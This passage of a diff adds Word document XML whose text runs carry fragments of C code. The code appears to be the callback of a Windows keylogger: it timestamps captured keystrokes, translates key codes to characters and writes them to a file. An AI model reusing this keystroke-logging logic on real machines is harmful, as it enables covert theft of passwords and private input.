+        <w:t>GetTimeFormat</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>LOCALE_SYSTEM_DEFAULT, 0, &amp;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>st</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, NULL, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>g_buf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>, MAX_BUFSIZE);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="2355"/>
+        </w:tabs>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>strcat</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>g_buf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>, "</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>");</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="2355"/>
+        </w:tabs>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>char</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> * </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>buf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>g_buf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> + </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>strlen</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>g_buf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="2355"/>
+        </w:tabs>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>if</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>getSysKey</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>ks</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>-&gt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>vkCode</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>))</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="2355"/>
+        </w:tabs>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>{</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="2355"/>
+        </w:tabs>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>WriteFile</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">file, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>g_buf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>strlen</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>g_buf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>), &amp;written, NULL);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="2355"/>
+        </w:tabs>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="2355"/>
+        </w:tabs>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>else</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> if (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>getCharKey</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>ks</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>-&gt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>vkCode</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>ks</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>-&gt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>scanCode</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, (LPWORD) </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>buf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>winID</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>))</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="2355"/>
+        </w:tabs>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+        </w:rPr>
+        <w:t>{</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="2355"/>
+        </w:tabs>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
